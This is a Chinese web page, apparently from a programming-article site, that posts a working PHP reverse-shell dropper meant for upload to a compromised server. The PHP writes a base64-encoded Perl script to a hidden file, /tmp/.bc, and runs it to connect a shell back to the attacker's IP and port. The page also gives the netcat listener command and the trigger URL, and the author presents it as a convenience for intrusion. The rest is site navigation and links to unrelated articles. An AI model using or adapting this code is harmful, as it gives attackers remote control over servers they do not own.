首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

php反弹shell实现代码

Posted in PHP onApril 22, 2009

非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。
声明,没啥技术含量,主要是用来方便。这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码 

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "your IP"; 
$yourport = 'your port'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

先在本地执行 nc -l -vv -p port 然后访问这个php页面 http://www.site.com/fuck.php 本地就会得到一个反弹的shell。
仅限猥琐流使用,如果有什么好的猥琐的方法,请不吝赐教

php反弹shell实现代码

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
1.PHP简介
Oct 09 PHP
什么是MVC,好东西啊
May 03 PHP
PHP 第三节 变量介绍
Apr 28 PHP
phpcms模块开发之swfupload的使用介绍
Apr 28 PHP
php获取字符串中各个字符出现次数的方法
Feb 23 PHP
php压缩和解压缩字符串的方法
Mar 14 PHP
PHP生成唯一订单号
Jul 05 PHP
Nginx服务器上安装并配置PHPMyAdmin的教程
Aug 18 PHP
PHP MYSQL实现登陆和模糊查询两大功能
Feb 05 PHP
php远程下载类分享
Apr 13 PHP
PHP的PDO大对象(LOBs)
Jan 27 PHP
PHP使用HTML5 FileApi实现Ajax上传文件功能示例
Jul 01 PHP
将数组写入txt文件 var_export
Apr 21 #PHP
php 保留小数点
Apr 21 #PHP
PHP 中执行排序与 MySQL 中排序
Apr 21 #PHP
一个php导出oracle库的php代码
Apr 20 #PHP
php一句话cmdshell新型 (非一句话木马)
Apr 18 #PHP
对squid中refresh_pattern的一些理解和建议
Apr 17 #PHP
PHP 加密与解密的斗争
Apr 17 #PHP
Xpath(1) redo log(1) LOGO(1) 抖音(1) binlog(2) 写入策略(1) Counter(1) MIME(1) 优化(1) 爬虫(2)
You might like
php 中include()与require()的对比
2006/10/09 PHP
php简单的会话类代码
2011/08/08 PHP
解析crontab php自动运行的方法
2013/06/24 PHP
destoon实现会员商铺中指定会员或会员组投放广告的方法
2014/08/21 PHP
浅谈php冒泡排序
2014/12/30 PHP
HTML代码中标签的全部属性 中文注释说明
2009/03/26 Javascript
js 页面关闭前的出现提示的实现代码
2011/05/25 Javascript
javascript获取浏览器类型和版本的方法(js获取浏览器版本)
2014/03/13 Javascript
项目中常用的JS方法整理
2015/01/30 Javascript
JavaScript和JQuery的鼠标mouse事件冒泡处理
2015/06/19 Javascript
jQuery基于ajax()使用serialize()提交form数据的方法
2015/12/08 Javascript
js实现下拉菜单效果
2017/03/01 Javascript
Bootstrap进度条实现代码解析
2017/03/07 Javascript
IScroll5实现下拉刷新上拉加载的功能实例
2017/08/11 Javascript
基于vue的换肤功能的示例代码
2017/10/10 Javascript
JS计算两个时间相差分钟数的方法示例
2018/01/10 Javascript
TypeScript基础入门教程之三重斜线指令详解
2018/10/22 Javascript
基于JS实现父组件的请求服务过程解析
2019/10/14 Javascript
jquery制作的移动端购物车效果完整示例
2020/02/24 jQuery
JavaScript实现无限轮播效果
2020/11/19 Javascript
JS实现鼠标移动拖尾
2020/12/27 Javascript
[01:02:54]完美世界DOTA2联赛PWL S2 FTD vs GXR 第一场 11.22
2020/11/26 DOTA
Python编程使用*解包和itertools.product()求笛卡尔积的方法
2017/12/18 Python
Python 使用with上下文实现计时功能
2018/03/09 Python
Python自然语言处理 NLTK 库用法入门教程【经典】
2018/06/26 Python
python 3.74 运行import numpy as np 报错lib\site-packages\numpy\__init__.py
2019/10/06 Python
详解CSS中iconfont的使用
2015/08/04 HTML / CSS
物流仓管员工作职责
2014/01/06 职场文书
捐款倡议书格式范文
2014/05/14 职场文书
行政执法队伍作风整顿剖析材料
2014/10/11 职场文书
2015年护士节慰问信
2015/03/23 职场文书
2015年学校财务工作总结
2015/05/19 职场文书
离职证明范本
2015/06/12 职场文书
土木工程生产实习心得体会
2016/01/22 职场文书
2019新员工试用期转正申请书3篇
2019/08/13 职场文书
postgresql中如何执行sql文件
2023/05/08 PostgreSQL